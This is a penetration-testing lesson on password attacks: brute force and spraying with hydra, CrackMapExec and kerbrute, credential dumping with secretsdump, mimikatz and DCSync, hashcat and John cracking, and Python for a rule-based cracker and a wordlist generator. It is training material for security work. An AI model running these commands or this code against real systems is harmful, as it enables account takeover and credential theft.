Vulnerability Analysis & Exploitation
Password Attacks
Password attacks remain one of the most reliable ways to gain access, because weak, reused and default credentials are still common. This lesson covers online attacks against live services and offline cracking of captured hashes.
Online Password Attacks
Online attacks send guesses to a live service, so every attempt is logged and counts toward any lockout policy. Check the lockout threshold before you start, keep the thread count low, and prefer spraying over per-user brute force when you have many usernames.
Hydra (Multi-Protocol)
SSH Brute Force (hydra itself recommends -t 4 for SSH; with more parallel tasks the server drops connections and attempts are silently lost):
hydra -l username -P /usr/share/wordlists/rockyou.txt -t 4 ssh://10.10.10.10
FTP:
hydra -L users.txt -P passwords.txt ftp://10.10.10.10
HTTP POST Login:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
SMB:
hydra -L users.txt -P passwords.txt smb://10.10.10.10
Hydra Options
| Flag | Purpose |
|---|---|
| -l | Single username |
| -L | Username list |
| -p | Single password |
| -P | Password list |
| -t | Parallel tasks per target (default 16; use -t 4 for SSH) |
| -f | Stop after the first valid pair is found |
| -v | Verbose output |
CrackMapExec (Windows/AD)
# Credential brute force over SMB: every user in users.txt against every password in passwords.txt (this is not a spray; see Password Spray Attacks below)
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
# WinRM (a valid login here means you can run remote PowerShell)
crackmapexec winrm 10.10.10.10 -u user -p password
# Authenticate against the host's local SAM instead of the domain; "(Pwn3d!)" in the output means the account is a local admin
crackmapexec smb 10.10.10.10 -u user -p password --local-auth
Medusa
# SSH attack
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# HTTP basic auth against the /admin directory
medusa -h 10.10.10.10 -u admin -P passwords.txt -M http -m DIR:/admin
Offline Password Cracking
Offline attacks work on captured hashes without network interaction.
Hash Identification
# hashid prints every type the string could be; it cannot separate types that share a length, so decide from where the hash came
hashid 'hash_here'
# hash-identifier does the same interactively (paste the hash at its prompt)
hash-identifier
# Common hash patterns
MD5: 32 hex characters
SHA1: 40 hex characters
SHA256: 64 hex characters
NTLM: 32 hex characters, indistinguishable from MD5 by length; anything from a SAM or NTDS dump is NTLM
bcrypt: $2a$, $2b$, $2y$ prefix (salted, with a cost factor, so slow to crack by design)
md5crypt / sha512crypt: $1$ / $6$ prefix (Linux /etc/shadow)
Hashcat (GPU-Powered)
Basic Usage:
hashcat -m <mode> hash.txt wordlist.txt
Common Modes:
| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM |
| 3200 | bcrypt |
| 1800 | sha512crypt ($6$) |
| 500 | md5crypt ($1$) |
| 13100 | Kerberoast |
| 18200 | AS-REP Roast |
NTLM Cracking:
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
With Rules:
hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
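A rule file tells hashcat how to mangle each wordlist entry before hashing it, which is what turns password into P@ssw0rd or Welcome123 without those strings ever being in the wordlist. As an added example (not code from this lesson or from hashcat), the Python below implements a subset of hashcat's rule syntax, the same function letters best64.rule uses, and runs a wordlist-plus-rules attack against unsalted MD5, SHA1 and SHA256 targets. The wordlist, the rule file and the target hashes are constructed for the demo; NTLM is left out because it is MD4 over UTF-16LE and hashlib's MD4 is missing on current OpenSSL builds.

```python
import hashlib

# Unsalted modes from the table above that hashlib provides.
MODES = {
    0: lambda pw: hashlib.md5(pw.encode()).hexdigest(),        # MD5
    100: lambda pw: hashlib.sha1(pw.encode()).hexdigest(),     # SHA1
    1400: lambda pw: hashlib.sha256(pw.encode()).hexdigest(),  # SHA256
}


def _pos(ch):
    """Hashcat writes positions as 0-9 and then A-Z for 10-35."""
    return int(ch, 36)


def apply_rule(rule, word):
    """Apply one rule line (a subset of hashcat's rule syntax) to a word.

    Functions are read left to right; spaces separate them. Supported:
    : l u c C t r d f { } [ ]  and the argument forms $X ^X @X 'N DN TN sXY.
    """
    w, i = word, 0

    def arg(n=1):
        nonlocal i
        if i + n > len(rule):
            raise ValueError("rule %r is truncated" % rule)
        i += n
        return rule[i - n:i]

    while i < len(rule):
        op = arg()
        if op in " :":
            continue                                       # separator / no-op
        elif op == "l": w = w.lower()
        elif op == "u": w = w.upper()
        elif op == "c": w = w[:1].upper() + w[1:].lower()  # capitalize
        elif op == "C": w = w[:1].lower() + w[1:].upper()  # invert capitalize
        elif op == "t": w = w.swapcase()                   # toggle case
        elif op == "r": w = w[::-1]                        # reverse
        elif op == "d": w = w * 2                          # duplicate
        elif op == "f": w = w + w[::-1]                    # reflect
        elif op == "{": w = w[1:] + w[:1]                  # rotate left
        elif op == "}": w = w[-1:] + w[:-1]                # rotate right
        elif op == "[": w = w[1:]                          # delete first char
        elif op == "]": w = w[:-1]                         # delete last char
        elif op == "$": w = w + arg()                      # append char
        elif op == "^": w = arg() + w                      # prepend char
        elif op == "@": w = w.replace(arg(), "")           # purge char
        elif op == "'": w = w[:_pos(arg())]                # truncate at N
        elif op == "D":
            n = _pos(arg()); w = w[:n] + w[n + 1:]         # delete char at N
        elif op == "T":
            n = _pos(arg()); w = w[:n] + w[n:n + 1].swapcase() + w[n + 1:]  # toggle case at N
        elif op == "s":
            a, b = arg(2); w = w.replace(a, b)             # replace every a with b
        else:
            raise ValueError("unsupported rule function %r in %r" % (op, rule))
    return w


def load_rules(text):
    """Rule-file text: one rule per line, blanks and # comments ignored."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def crack(target_hex, mode, words, rules):
    """Wordlist + rules attack: every word under every rule, first hit wins.
    Returns (word, rule, plaintext) or None."""
    hash_fn = MODES[mode]
    target = target_hex.lower()
    seen = set()                       # different rules often yield the same candidate
    for word in words:
        for rule in rules:
            candidate = apply_rule(rule, word)
            if candidate in seen:
                continue
            seen.add(candidate)
            if hash_fn(candidate) == target:
                return word, rule, candidate
    return None


# Constructed inputs for the demo: a three-word "wordlist" and a rule file in
# hashcat syntax with a few best64-style transformations.
WORDS = ["summer", "password", "welcome"]
RULES_TEXT = """
# constructed rule file (hashcat syntax)
:
c
c $1 $2 $3
c sa@ so0
u
r
] ]
$2 $0 $2 $4 $!
"""
RULES = load_rules(RULES_TEXT)

if __name__ == "__main__":
    # Targets are hashed here from known plaintexts so the demo is self-contained.
    for mode, plaintext in [(1400, "P@ssw0rd"), (0, "Welcome123"), (100, "nothing-here")]:
        print(mode, crack(MODES[mode](plaintext), mode, WORDS, RULES))
```

Three words and eight rules already produce 24 candidates; rockyou.txt with best64.rule is the same multiplication at scale, which is why rules are the first thing to add when a plain wordlist run comes back empty.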
John the Ripper
Basic Usage:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Specify Format:
john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt ntlm_hashes.txt
Show Cracked:
john --show hashes.txt
Extracting Hashes
Linux Password Hashes
# Hashes live in /etc/shadow (readable by root only); /etc/passwd holds the user names
# Format: user:$id$salt$hash:...  ($1$ md5crypt, $5$ sha256crypt, $6$ sha512crypt, $y$ yescrypt on current Debian/Ubuntu)
# unshadow joins the two files into the one-line-per-user input John expects
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt
Windows Password Hashes
From SAM Database (Local):
# With Impacket, offline, after copying the SAM and SYSTEM hives off the host (needs local admin; SYSTEM holds the boot key that decrypts the SAM)
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
# Using mimikatz on the target: lsadump::sam reads the SAM (run privilege::debug and token::elevate first)
mimikatz# lsadump::sam
# sekurlsa::logonpasswords reads LSASS instead, not the SAM: NT hashes of currently logged-on users (plaintexts too where WDigest is enabled)
mimikatz# sekurlsa::logonpasswords
From Domain Controller:
# DCSync: ask the DC to replicate every account's secrets over DRSUAPI; needs replication rights (Domain Admins have them) and runs no code on the DC
impacket-secretsdump domain.local/admin:password@10.10.10.10
Password Spray Attacks
Spray one password against every user, then wait out the lockout observation window before trying the next one: each account collects a single failure per round, so the bad-password counter stays below the lockout threshold. Read the domain's lockout policy before you start and count every attempt you make.
# Using CrackMapExec (--continue-on-success keeps going after a hit so every user is checked)
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success
# Using Kerbrute (Kerberos)
kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt 'Password123!'
Wordlists
Built-in Kali Wordlists
/usr/share/wordlists/
├── rockyou.txt # Most common (ships as rockyou.txt.gz on Kali; gunzip it first)
├── dirb/common.txt # Web directories
├── dirbuster/ # More web wordlists
└── seclists/ # Comprehensive collection
Custom Wordlists
Using cewl:
# Generate wordlist from website
cewl http://10.10.10.10 -w custom_wordlist.txt
# With depth and minimum word length
cewl http://10.10.10.10 -d 2 -m 5 -w custom.txt
Using crunch:
# Generate all 4-char combinations
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# With pattern
crunch 8 8 -t Pass@@%% -o wordlist.txt
# -t placeholders: @ = lowercase letter, , = uppercase letter, % = digit, ^ = symbol; any other character is literal
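What crunch does with a -t pattern is take the product of one character set per position, and the size of that product decides whether the wordlist is practical to write to disk at all. As an added example (not crunch's own code), the Python below reproduces the placeholder expansion and the line and byte estimate crunch prints before it starts generating; the symbol set used for ^ is an assumption for the demo and may differ from crunch's list. For large keyspaces, pipe the generator straight into the cracker instead of writing a file, or use hashcat's mask attack (-a 3 with ?l ?u ?d ?s), which does the same expansion on the GPU.

```python
import itertools
import string

# crunch -t placeholders. The symbol set for ^ is an assumption for this demo.
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "
PLACEHOLDERS = {
    "@": string.ascii_lowercase,   # one lowercase letter
    ",": string.ascii_uppercase,   # one uppercase letter
    "%": string.digits,            # one digit
    "^": SYMBOLS,                  # one symbol
}


def charsets_for(pattern):
    """One character set per output position; any other character is literal."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def estimate(pattern):
    """(lines, bytes) the pattern expands to, counting a newline per line.
    This is the feasibility check to make before writing anything to disk."""
    lines = 1
    for cs in charsets_for(pattern):
        lines *= len(cs)
    return lines, lines * (len(pattern) + 1)


def expand(pattern):
    """Generate every word matching the pattern, rightmost position varying fastest."""
    for combo in itertools.product(*charsets_for(pattern)):
        yield "".join(combo)


def brute(min_len, max_len, charset):
    """crunch <min> <max> <charset> without -t: every string of each length."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def human(n):
    """Byte count as a short unit string, for the estimate printout."""
    for unit in ("B", "KB", "MB", "GB", "TB", "PB"):
        if n < 1024 or unit == "PB":
            return "%.1f %s" % (n, unit)
        n /= 1024


if __name__ == "__main__":
    for pattern in ("Pass@@%%", "@@@@@@@@", "Summer%%%%^"):
        lines, size = estimate(pattern)
        print("%-12s %15d lines  %s" % (pattern, lines, human(size)))
    print(list(itertools.islice(expand("Pass@@%%"), 3)))
```

Pass@@%% is 67,600 lines and well under a megabyte; eight lowercase letters is 26^8, about 209 billion lines and close to two terabytes, which is the kind of number that should send you to a mask attack or a piped generator rather than an output file.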
Common Default Credentials
Always try these before brute forcing:
| Service | Username | Password |
|---|---|---|
| SSH | root, admin | root, admin, password |
| MySQL | root | (blank), root, mysql |
| PostgreSQL | postgres | postgres |
| Tomcat | tomcat, admin | tomcat, admin, s3cret |
| Jenkins | admin | admin |
| phpMyAdmin | root | (blank) |
| WordPress | admin | admin |
Password Attack Workflow
1. Enumerate users
└── SMTP, RID cycling, web enumeration
2. Try default credentials
└── Check service documentation
3. Password spray (many users, a few likely passwords)
└── Common passwords: Password1, Welcome1; stay under the lockout threshold and wait out the observation window between rounds
4. Targeted brute force (few users, and no lockout policy in the way)
└── hydra with rockyou.txt
5. Offline cracking (if hashes obtained)
└── hashcat with rules
With exploitation techniques mastered, we'll move to web application attacks in the next module.